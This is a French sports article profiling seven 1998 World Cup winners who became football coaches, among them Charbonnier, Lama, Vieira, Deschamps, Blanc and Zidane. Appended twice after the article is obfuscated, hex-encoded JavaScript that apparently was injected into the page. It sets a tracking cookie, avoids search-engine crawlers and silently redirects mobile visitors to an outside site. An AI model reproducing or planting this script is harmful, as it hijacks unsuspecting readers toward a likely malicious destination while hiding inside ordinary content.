Articles

Ces champions du Monde 1998 devenus entraineur.

Les héros français de la fin du deuxième millénaire ont bien grandi, 17 ans après cet exploit impérissable, nos 22 champions du Monde en ont fini avec leur carrière de joueur. Mis à part certains irrévérencieux, comme Stéphane Guivarc’h, vendeur de piscine, ou Lilian Thuram lancé dans la politique, la majorité d’entre eux baignent encore dans le monde du football. Parmis eux, ce sont les entraîneurs actuels ou passés qui nous intéressent comme le dernier en date Zinédine Zidane. Focus sur ces sept tacticiens aux fortunes diverses.

 

Lionel Charbonnier, le globe trotter

2034387640_ID7185333_webcharbonphoto_151714_H3KG51_0

Probablement le champion du Monde 1998 le moins connu. Troisième dans la hiérarchie des gardiens durant la compétition, derrière Fabien Barthez et Bernard Lama, le portier de l’AJ Auxerre notamment, aura passé son mondial bien installé sur le banc des différents stades français à encourager ses coéquipiers. Une activité noble, qui lui a valu le Saint Graal pour tout footballeur.

Sorti d’une carrière de joueur tout à fait honorable, avec comme point culminant (derrière la CDM 1998) le doublé championnat-coupe de France en 1996 ; Lionel Charbonnier enfile dès 2002, à 36 ans, le costume d’entraîneur. Cette première expérience se fait au FC Stade Poitevin, modeste club que l’ancien gardien parvient à faire monter en CFA. Par la suite, six équipes suivront, pour des choix alliant exotismes et fugacités, avec notamment un poste de sélectionneur de l’Équipe nationale de Tahiti en 2007. Cette expérience lui permettra d’entrer dans l’histoire de l’île du sud Pacifique en qualifiant les U20 pour la première compétition mondiale de l’île.

Après cet exploit, et des passages éphémères dans une équipe indonésienne et belge, le retour en France s’effectue avec le FC Istres. Seulement, l’idylle ne durera que six mois suite à de mauvais résultats. En rien démonté par cette expérience, Lionel Charbonnier et son insatiable désir de parcourir la planète pose ses valises au Congo, pour parapher un contrat de deux ans chez le SM Sanga Balende. Seulement, les deux ans se sont transformés en deux mois, prétextant un environnement peu enclin à son épanouissement. À 49 ans, le climax de la vie d’entraîneur de Lionel Charbonnier n’est pas encore arrivé (on l’espère), même si un poste d’entraîneur au Real Madrid semble encore utopiste.

 

Bernard Lama, l’éphémère

lama1

La carrière d’entraîneur de l’ancien gardien du Paris Saint-Gemain est aussi brève que chaotique. Cinq ans après l’arrêt de sa carrière de joueur, Bernard Lama devient en 2006 le sélectionneur de la modeste sélection du Kenya. Résultat, trois petits matchs, dont trois défaites et puis s’en va. Un début de reconversion peu enviable qui peut décrédibiliser de manière immuable une carrière.

Depuis 2012, l’homme aux 44 sélections en Équipe de France est parvenu à devenir le manager général de l’Équipe de Guyane française, sélection non reconnue par la FIFA. En plus de ce poste, celui qui a grandi en Guyane aide au développement du sport sur ce territoire enclavé entre le Brésil et le Suriname. Bonne chance.

Bernard Diomède, le jeune

151217112218_6

Le « petit bonhomme » d’Aimé Jacquet lors de la Coupe du Monde 1998 a connu une reconversion assez atypique. L’ancien auxerrois a d’abord choisi les bancs de l’école, et est sorti diplômé de Manager général de club sportif en 2008. Ce qui lui permettra par la suite de devenir intervenant auprès des Master 2 « Droit, Économie et Gestion du Sport ». Grosse tête le Bernard. Parallèlement à cette activité, il crée en 2008 l’Académie Bernard Diomède – institution à but non lucrative – permettant aux jeunes par le biais d’un triptyque scolaire sportif et éducatif d’assouvir leurs rêves.

En 2015, il obtient son BEPF (Brevet d’Entraîneur Professionnel de Football) qui lui ouvre les portes quelques mois plus tard de l’Équipe de France U17, en remplacement de Jean-Claude Giuntini, vainqueur cette même année de l’EURO U17.

 

Patrick Vieira, l’américain

Patrick Vieira

Après avoir mis un terme à sa carrière en 2011 avec Manchester City à l’âge de 35 ans, l’ancien numéro 4 des Bleus a préféré rester dans la sphère du club. D’abord en tant que représentant des Citizens à l’étranger, rôle toujours obscur qu’il tiendra jusqu’en 2013. Après cela, il prend en charge l’équipe de jeunes (U21) de Manchester City, un poste d’avantage porté vers la formation, qui lui sera conféré pendant deux saisons. Annoncé à plusieurs reprises comme prétendant au poste de coach principal de Manchester City, il devient finalement en novembre 2015 l’entraîneur de la franchise MLS New York City pour la saison 2016. Le Club new-yorkais est étroitement lié à celui de Manchester City, les fonds d’investissements des deux clubs émanent de la même entité. Celle du Qatar bien-sûr.

À New-York, l’ancien joueur d’Arsenal aura sous ses ordres de grands noms – à savoir : Andrea Pirlo, Frank Lampard ou encore David Villa. Il devient par la même occasion le premier entraîneur français à officier dans la ligue nord américaine. L’Amérique avant le rêve européen.

 

Didier Deschamps, le gagnant

Mondial-La-liste-surprise-de-Didier-Deschamps_article_popin

Le recordman de capitanats en Équipe de France se prédestinait déjà à une carrière d’entraîneur pendant qu’il évoluait sur le rectangle vert. Sa propension à mener les débats dans le vestiaire faisait de lui un relai de choix pour ses différents coachs. Didier Deschamps n’a donc eu aucun problème à se rendre soluble à ce métier. Entraîneur dès l’âge de 33 ans, le bayonnais est probablement, avec Arsène Wenger, l’entraîneur français le plus respecté en Europe.

Ses principaux faits d’armes et non des moindres sont les suivants : une finale de Ligue des Champions en 2004 avec l’AS Monaco, un championnat de France avec Marseille en 2010 – que le club attendait depuis 18 ans, un championnat de Serie B avec la juventus Turin, ou encore trois Coupes de la Ligue. Une juxtaposition de titres qui mettent en exergue les grandes qualités du sélectionneur de l’Équipe de France. Là où plait également Didier Deschamps, c’est dans son besoin viscéral de gagner des titres. Une mentalité qui dénote par rapport aux autres coachs français, aux discours et aux velléités plus sclérosés.

 

Laurent Blanc, le parisien

laurent-blanc-11-03-2015-chelsea---paris-saint-germain-1-8finale-retour-champions-league-20150311215517-1494

À l’instar de Didier Deschamps, Laurent Blanc a lui aussi une place de choix dans la hiérarchie des entraîneurs français. D’abord coach des Girondins de Bordeaux à partir de 2007, le Président n’a pas lésiné avant d’obtenir ses premiers trophées. Dès sa deuxième saison chez les aquitains, il réalise le doublé championnat-coupe de la Ligue, inédit jusqu’à présent en terre girondine. Il est aussi le premier champion du Monde 1998 à devenir sélectionneur de l’Équipe de France (2010-2012).

Depuis 2013, il est le coach d’une place forte européenne, le Paris Saint-Germain. Quasi triple champion de France, Laurent Blanc a la possibilité de devenir le premier technicien français vainqueur d’une Ligue des Champions. Une belle ligne sur son CV, lui permettant d’aspirer au titre de meilleur entraîneur français de l’histoire. Affaire à suivre.

 

Zinédine Zidane, le nouveau

2048x1536-fit_zinedine-zidane-stade-france-26-mars-2015

Depuis le 4 janvier, jour de sa nomination à la tête du Real Madrid, le monde du foot est en ébullition. Une telle émulation autour d’un entraîneur est très rare, seulement, rien ne semble rationnel quand il s’agit de Zinédine Zidane.

Premier entraîneur français du Real Madrid, il est aussi le premier à prendre la tête d’une équipe de top niveau mondial dans l’ère moderne (Didier Deschamps a entraîné une Juventus Turin qui évoluait en Serie B, ndlr).

Après avoir fait ses gammes à la Castilla, l’antichambre du Real Madrid, l’ancien numéro 10 des Bleus est désormais contraint de flirter avec la perfection. Heureusement pour lui et pour le Real, il a une certaine propension à cela.

De nombreuses personnalités du foot ont réagi à l’arrivée de Zidane à la maison blanche. Une très grande majorité s’en est réjouie, comme son ancien coéquipier Laurent Blanc : « Comme je lui ai dit, c’est beau. Son premier club, c’est le Real Madrid ! C’est beau, extraordinaire. J’en suis très heureux pour lui, je lui souhaite le meilleur ». D’autres, comme l’ancien coach du Bayern, Ottmar Hitzfeld, ont émis de grandes réserves : « Pour lui (Zidane), c’est comme gagner le jackpot au loto. C’est une folie. Il vit seulement sur son illustre nom de joueur ». Un allemand jaloux.

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}